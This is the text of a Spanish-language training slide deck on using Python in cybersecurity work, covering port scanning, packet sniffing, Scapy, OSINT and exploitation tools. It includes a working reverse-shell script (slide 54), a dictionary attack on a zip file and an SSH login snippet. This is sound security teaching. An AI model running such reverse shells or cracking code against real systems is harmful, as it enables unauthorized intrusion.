Slide 1

Slide 1 text

www.sti-innsbruck.at Python para equipos de ciberseguridad @jmortegac

Slide 2

Slide 2 text

About me 2 http://jmortega.github.io/

Slide 3

Slide 3 text

About me 3 https://www.youtube.com/c/JoseManuelOrtegadev/

Slide 4

Slide 4 text

Books 4 ● Introducción al desarrollo seguro ● Aspectos fundamentales de desarrollo seguro ● Herramientas OWASP ● Seguridad en aplicaciones Android ● Seguridad en proyectos NodeJS ● Seguridad en proyectos Python ● Análisis estático y dinámico en aplicaciones C/C++ ● Metodologías de desarrollo

Slide 5

Slide 5 text

Books 5

Slide 6

Slide 6 text

Formación 6 https://www.adrformacion.com/cursos/pythonseg/pythonseg.html

Slide 7

Slide 7 text

Agenda • Introducción a Python para proyectos de ciberseguridad • Herramientas de pentesting • Herramientas Python desde el punto de vista defensivo • Herramientas Python desde el punto de vista ofensivo 7

Slide 8

Slide 8 text

Python para proyectos de ciberseguridad 8 1. Diseñado para la creación rápida de prototipos 2. Estructura simple y limpia, mejora la legibilidad y facilidad de uso. 3. Amplia biblioteca, también facilidad de interconexión 4. Ampliamente adoptado, la mayoría de las distribuciones de Linux lo instalan por defecto.

Slide 9

Slide 9 text

Python para proyectos de ciberseguridad 9

Slide 10

Slide 10 text

Herramientas de pentesting 10 import boto3 aws_access_key_id = '' aws_secret_access_key = '' region_name = 'ap-southeast-2' session = boto3.session.Session(aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, region_name=region_name) ec2client = session.client('ec2') client_instance = ec2client.run_instances( ImageId='ami-30041c53', KeyName='Keys', MinCount=1, MaxCount=1, InstanceType='t2.micro') https://aws.amazon.com/es/sdk-for-python/

Slide 11

Slide 11 text

Herramientas de pentesting 11

Slide 12

Slide 12 text

Herramientas de pentesting 12 import re input_ip = input('Enter the ip:') flag = 0 pattern = "^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$" match = re.match(pattern, input_ip) if (match): field = input_ip.split(".") for i in range(0, len(field)): if (int(field[i]) < 256): flag += 1 else: flag = 0 if (flag == 4): print("valid ip") else: print('No match for ip or not a valid ip') https://docs.python.org/3/library/re.html

Slide 13

Slide 13 text

Herramientas de pentesting 13

Slide 14

Slide 14 text

Herramientas de pentesting 14 import nmap nma = nmap.PortScannerAsync() def callback_function(host, scan_result): print('RESULTADO ==>') print(host, scan_result) nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function) while nma.still_scanning(): print("Esperando a que termine el escaneo ...") nma.wait(2) https://pypi.org/project/python-nmap/

Slide 15

Slide 15 text

Basic Networking 15

Slide 16

Slide 16 text

Port Scanning 16

Slide 17

Slide 17 text

Port Scanning 17

Slide 18

Slide 18 text

Port Scanning 18 import socket from concurrent import futures def check_port(targetIp, portNumber, timeout): TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) TCPsock.settimeout(timeout) try: TCPsock.connect((targetIp, portNumber)) return (portNumber) except: return def port_scanner(targetIp, timeout): threadPoolSize = 500 portsToCheck = 10000 executor = futures.ThreadPoolExecutor(max_workers=threadPoolSize) checks = [ executor.submit(check_port, targetIp, port, timeout) for port in range(0, portsToCheck, 1) ] for response in futures.as_completed(checks): if (response.result()): print('Listening on port: {}'.format(response.result()))

Slide 19

Slide 19 text

Port Scanning 19

Slide 20

Slide 20 text

Banner Grabing 20

Slide 21

Slide 21 text

Scraping 21 ● Requests ○ https://docs.python-requests.org/en/master ○ Peticiones HTTP ● BeautifulSoup ○ https://www.crummy.com/software/BeautifulSou p/bs4/doc ○ Parser XML,HTML ● Scrapy ○ https://scrapy.org ○ Framework de scraping

Slide 22

Slide 22 text

Scraping 22 #!/bin/python from bs4 import BeautifulSoup import requests url = input("Enter a website to extract the URL's from: ") response = requests.get("http://" +url) data = response.text soup = BeautifulSoup(data) for link in soup.find_all('a'): print(link.get('href'))

Slide 23

Slide 23 text

Scrapy 23

Slide 24

Slide 24 text

Extracción de subdominios 24 ● https://github.com/1N3/BlackWidow

Slide 25

Slide 25 text

OSINT 25 ● Recon-ng ○ https://github.com/lanmaster53/recon-ng ○ Framework para realizar reconocimientos basados en web. ● Belati ○ https://github.com/aancw/Belati ○ Recopilación de datos y documentos públicos y del sitio web y otros servicios. ● Pwndb ○ https://github.com/davidtavarez/pwndb ○ Buscar credenciales filtradas

Slide 26

Slide 26 text

wig - WebApp Information Gatherer 26

Slide 27

Slide 27 text

wig - WebApp Information Gatherer 27

Slide 28

Slide 28 text

Belati 28

Slide 29

Slide 29 text

Belati 29

Slide 30

Slide 30 text

Reconspider 30 ● https://github.com/bhavsec/reconspider

Slide 31

Slide 31 text

Reconspider 31

Slide 32

Slide 32 text

SpiderFoot 32

Slide 33

Slide 33 text

RED TEAM vs BLUE TEAM 33

Slide 34

Slide 34 text

SQLMap 34 ● https://sqlmap.org

Slide 35

Slide 35 text

SQLMap 35

Slide 36

Slide 36 text

PwnXSS 36

Slide 37

Slide 37 text

Fuzzing 37 ● Wfuzz ○ https://github.com/xmendez/wfuzz/ ○ Web fuzzer framework ● Pyfuzz ○ https://github.com/AyoobAli/pyfuzz ○ Fuzzing para descubrir archivos / directorios ocultos

Slide 38

Slide 38 text

Fuxi Scanner 38 ● https://github.com/jeffzh3ng/fuxi

Slide 39

Slide 39 text

Fuxi Scanner 39

Slide 40

Slide 40 text

Sniffing de paquetes 40 import socket import struct def ethernet_frame(data): dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14]) return format_mac_addr(dest_mac), format_mac_addr(src_mac), socket.htons(proto), data[14:] def format_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper() def main(): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) while True: raw_data, addr = conn.recvfrom(65535) dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data) if eth_proto == 8: print('\nEthernet Frame:') print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto)) print(data) if __name__ == "__main__": main()

Slide 41

Slide 41 text

Manipulación de paquetes 41 ● Scapy ○ https://scapy.net ○ Manipulación y decodificación de paquetes. ○ Enviar, rastrear, diseccionar y falsificar paquetes de red.

Slide 42

Slide 42 text

Manipulación de paquetes 42 from scapy.all import * packetCount = 0 def customAction(packet): global packetCount packetCount += 1 return "{}) {} → {}".format(packetCount, packet[0][1].src, packet[0][1].dst) ## Setup sniff, filtering for IP traffic sniff(filter="ip",prn=customAction)

Slide 43

Slide 43 text

Manipulación de paquetes 43 from scapy.all import ICMP from scapy.all import IP from scapy.all import sr1 from scapy.all import ls if __name__ == "__main__": dest_ip = "www.google.com" ip_layer = IP(dst = dest_ip) print(ls(ip_layer)) # displaying complete layer info # accessing the fields print("Destination = ", ip_layer.dst) print("Summary = ",ip_layer.summary())

Slide 44

Slide 44 text

Sniffing de paquetes 44 from scapy.all import * def main(): sniff(prn=http_header, filter="tcp port 80") def http_header(packet): http_packet=str(packet) if http_packet.find('GET'): return print_packet(packet) def print_packet(packet1): ret = "-------------------------------[ Received Packet ] -------------------------------\n" ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n")) ret += "---------------------------------------------------------------------------------\n" return ret if __name__ == '__main__': main()

Slide 45

Slide 45 text

Explotación 45 ● Pacu ○ https://github.com/RhinoSecurityLabs/pacu ○ Framework de explotación de AWS ● AWS Pwn ○ https://github.com/dagrz/aws_pwn ○ Colección de scripts de pruebas de penetración de AWS

Slide 46

Slide 46 text

Explotación 46 ● CrackMapExec ○ https://github.com/byt3bl33d3r/CrackMapExec ○ Mapeo de la red, obtiene credenciales y ejecuta comandos. ● DeathStar ○ https://github.com/byt3bl33d3r/DeathStar ■ Permite automatizar la escalada de privilegios en un entorno Active Directory.

Slide 47

Slide 47 text

Password cracking 47 import zipfile import time encrypted_filename= "secret_file.zip" zFile = zipfile.ZipFile(encrypted_filename, "r") passFile = open("passwords.txt", "r") for line in passFile.readlines(): test_password = line.strip("\n").encode('utf-8') try: print(test_password) zFile.extractall(pwd=test_password) print("Match found") break except Exception as err: pass

Slide 48

Slide 48 text

SSH brute force 48 import paramiko ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(‘127.0.0.1', username=‘user', password=‘password') stdin,stdout,stderr = ssh.exec_command("uname -a")

Slide 49

Slide 49 text

SSH brute force 49

Slide 50

Slide 50 text

Ejecución de procesos 50 https://docs.python.org/3/library/subprocess.html import subprocess subprocess.run('ls -la', shell=True) subprocess.run(['ls', '-la'])

Slide 51

Slide 51 text

Ejecución de procesos 51 https://docs.python.org/3/library/subprocess.html import subprocess process = subprocess.run(['which', 'python3'], capture_output=True) if process.returncode != 0: raise OSError('Sorry python3 is not installed') python_bin = process.stdout.strip() print(f'Python found in: {python_bin}') CompletedProcess(args=['which', 'python3'], returncode=0, stdout=b'/usr/bin/python3\n', stderr=b'')

Slide 52

Slide 52 text

Ejecución de procesos 52 https://docs.python.org/3/library/subprocess.html from pathlib import Path import subprocess source = Path("/home/linux") cmd = ["ls", "-l", source] proc = subprocess.Popen(cmd, stdout=subprocess.PIPE) stdout, stderr = proc.communicate() print(stdout.decode("utf-8").split('\n')[:-1])

Slide 53

Slide 53 text

Shell inversa 53

Slide 54

Slide 54 text

Shell inversa 54 #!/usr/bin/python import socket import subprocess import os sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("127.0.0.1", 45679)) os.dup2(sock.fileno(),0) os.dup2(sock.fileno(),1) os.dup2(sock.fileno(),2) shell_remote = subprocess.call(["/bin/sh", "-i"]) #proc = subprocess.call(["/bin/ls", "-i"])

Slide 55

Slide 55 text

Books 55

Slide 56

Slide 56 text

Books 56 https://github.com/PacktPublis hing/Python-Ethical-Hacking https://github.com/PacktPub lishing/Python-for-Offensive -PenTest

Slide 57

Slide 57 text

GitHub repository 57 https://github.com/jmortega/python_ciberseguridad_2021

Slide 58

Slide 58 text

58